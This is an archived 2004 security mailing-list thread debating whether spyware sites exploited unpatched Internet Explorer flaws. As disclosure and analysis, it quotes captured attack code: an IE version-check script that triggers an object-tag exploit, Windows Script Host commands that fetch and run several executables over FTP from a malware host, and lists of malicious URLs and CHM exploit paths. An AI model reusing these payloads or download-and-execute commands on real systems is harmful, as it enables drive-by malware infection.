RE: [Full-Disclosure] RE: Still Vulnerable in MSIE
From: skid (skid_at_attglobal.net)
Date: 05/18/04
- Previous message: securityguru_at_earthlink.net: "[Full-Disclosure] C# Web application security scanner"
- Maybe in reply to: Jelmer: "[Full-Disclosure] RE: Still Vulnerable in MSIE"
- Next in thread: Jelmer: "RE: [Full-Disclosure] RE: Still Vulnerable in MSIE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>, <jkuperus@planet.nl> Date: Tue, 18 May 2004 13:53:45 -0400
Sorry, Jelmer, but you're WAY off base on this one. IMHO, spyware is
already larger than netsky and sobig, and will probably be larger than
nimda before the end of the year. But that's my opinion, you want
evidence, so here are some cold, hard facts.
Check out these http proxy log entries:
[05/Apr/2004:08:11:27 -0400] http://www dot
easywww.info/30-03-2004//EXPLOIT.CHM
[05/Apr/2004:08:35:03 -0400] http://203 dot
199.200.61/ads/shareit/ex//NETWIN.CHM
[09/Apr/2004:10:29:13 -0400] http://209 dot
50.251.182/vu083003/a024//EXPLOIT.CHM
[09/Apr/2004:10:29:19 -0400] http://209 dot 50.252.95/si2//SI2.CHM
These are exploits against the April vulnerabilities from Microsoft IE,
unpatchable until April 13. Many hooks installed by these exploits
remain undeteced by most anti-spyware and anti-virus software. Users
were driven to these sites typically through second, third and fourth
party banner advertisements.
Anyone with centrally managed anti-virus should have noticed an increase
in desktop AV hits around the beginning of April, which was about the
time the exploit was widely circulated on these lists, but before the
patch was available. However, the virus sigs typically lagged days
behind the emergence of these sites.
Virus hits also led to an interesting find that goes back to
October/November 2003. The machine was driven to http://allweb dot
dreamhost.com through harmless web browsing. The dreamhost site
included the following code:
max=0;
if(navigator.appVersion.indexOf("MSIE")) {
TabSplit=clientInformation.appMinorVersion.split(";");
for(i=0;i<TabSplit.length;i++) {
if (TabSplit[i].substring(0,1) == "Q") {
if (TabSplit[i].substring(1,TabSplit[i].length)>max) {
max=TabSplit[i].substring(1,TabSplit[i].length)
};
};
};
if (max<822925) {
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object data=index.htm>";
oPopup.show(0,0,1,1,document.body);
};
showPopup();
};
};
This smartly exploits an object tag vulnerablity that I believe was
patched in August, and installed spyware/RATs. Not a day zero, but you
can see how quickly the injection vector was modified once the next vuln
was announced.
I'm only providing small pieces of a much larger puzzle which I'm only
beginning to frame, but the problem is HUGE. Search your http proxy
logs for April the string ".chm" and let me know if you agree.
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
Sent: Saturday, May 15, 2004 4:19 PM
To: 'Thor Larholm'; 'Greg Kujawa'; bugtraq@securityfocus.com;
full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] RE: Still Vulnerable in MSIE
While that is undoubtedly an impressive collection of nastiness all of
the issues you have amassed none of these pages, affected my fully
patches IE6 nor should they since they have been patched quite some time
ago as you are probably well aware.
Yet somehow after composing a list of all these old and patched
vulnerabilities this site exploited, you manage to reach the astounding
conclusion that it uses several remaining unpatched vulnerabilities.
Can you present evidence to support that claim?
To me it sound like a lot of FUD spread by a company that has much to
gain from spreading it. That said the site in question now no longer
presents these popups so there might have been stuff going on that Thor
didn't write up.
-----Original Message-----
From: Thor Larholm [mailto:thor@pivx.com]
Sent: zaterdag 15 mei 2004 0:45
To: Greg Kujawa; bugtraq@securityfocus.com
Subject: RE: Still Vulnerable in MSIE
Nothing new here, it's just one of the remaining IE vulnerabilities that
are not yet patched. If I dare allow a small product pitch, the publicly
available version of Qwik-Fix ( http://qwik-fix.net ) has protected
against threats such as this for more than half a year now, without
requiring any signature updates (since there are no need for
signatures).
This is not the first time that spyware has mixed with vulnerabilities,
exploits and worms. Spyware is increasingly becoming a corporate
liability, Robert Mitchell recently did a feature story on this at
http://www.computerworld.com/securitytopics/security/story/0,10801,92784
,00.html
The high of IE vulnerabilities on my Unpatched list was 32, right now we
are at about 12 that still have no patches. There's continuously new
research being posted to the Unpatched mailing list (
http://unpatched.pivxlabs.com ) on topics such as this spyware/worm
threat.
Anyway, back to hnc3k.com - there is obviously a lot happening on all of
these popups, and quite a number of IE exploits are being exploited. A
hint of caution, don't go to any of these pages without Qwik-Fix on your
machine, they contain malicious code which will execute on your system
if it does not have adequate protection. Another hint of caution, don't
panic if your AV labels this email as being naughty just because I
mention specific dirty words.
One of the pages that try to exploit IE vulnerabilities is at
http://65.17.207.40/framepb_1u.php
which redirects to
http://si1.default-homepage-network.com/180/180.htm?si-001
which redirects to
http://object.passthison.com/vu083003/object.cgi?si1
which uses the Object Data vulnerability to change your startpage to
http://default-homepage-network.com/start.cgi?hkcu
the parameter at the end is either HKCU or HKLM depending on what
registry branch lead you there. This serves to notify
default-homepage-network whether your machine has been compromised with
user or administrator privileges
start.cgi also opens a few popup windows with advertisements, after
which it opens the following page
http://default-homepage-network.com/newspynotice.html
that wants to sell you a cure against spyware which hijacks your start
page - as theirs just did.
That page also secretly opens
http://object.passthison.com/vu083003/newobject1.cgi
http://69.50.139.61/hp1/hp1.htm
http://www.achtungachtung.com/0021/index.php
newobject1.cgi executes the following commands through the Windows
Script Host object:
wsh.Run('command /C echo open
downloads.default-homepage-network.com>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6); wsh.Run('command
/C echo get infamous_downloader.exe>>o',false,6);
wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
wsh.Run('command /C echo get CS4P028.exe>>o',false,6); wsh.Run('command
/C echo bye>>o',false,6); wsh.Run('command /C echo if not exist
%windir%\statuslog ftp -s:o
>o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe
>>o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe
infamous_downloader.exe >>o.bat',false,6); wsh.Run('command /C echo if
exist 0021-bdl94126.EXE 0021-bdl94126.EXE
>>o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
>>o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
http://69.50.139.61/hp1/HP1.chm::/hp1.htm
framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
Other files that are attempted to be delivered are
http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
http://validation-required.info/ http://www.popmoney.net/ip/index.php
http://www.portalone.hostance.com.com/italia.exe
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@pivx.com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>
-----Original Message-----
From: Greg Kujawa [mailto:greg.kujawa@diamondcellar.com]
Sent: Friday, May 14, 2004 7:37 AM
To: bugtraq@securityfocus.com
Subject: Still Vulnerable in MSIE
With the latest vendor AV definitions and all of the Microsoft Security
Updates my MSIE 6 application still was vulnerable to some apparent
cross-site scripting exploit. I was hit with one of the many Agobot
variants when exiting a site detailing some IE vulnerabilities
(http://www.hnc3k.com). The site exit led to a series of pop-up and
pop-under ads.
All of these site redirects apparently resulted in a www2.flingstone.com
site dropping in a infamous.exe file onto my computer. All the while I
saw no prompts to download or execute anything whatsoever. All I did was
close the windows that were coming up.
Just an FYI since even the latest updates on all fronts cannot ensure
peace of mind.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: securityguru_at_earthlink.net: "[Full-Disclosure] C# Web application security scanner"
- Maybe in reply to: Jelmer: "[Full-Disclosure] RE: Still Vulnerable in MSIE"
- Next in thread: Jelmer: "RE: [Full-Disclosure] RE: Still Vulnerable in MSIE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
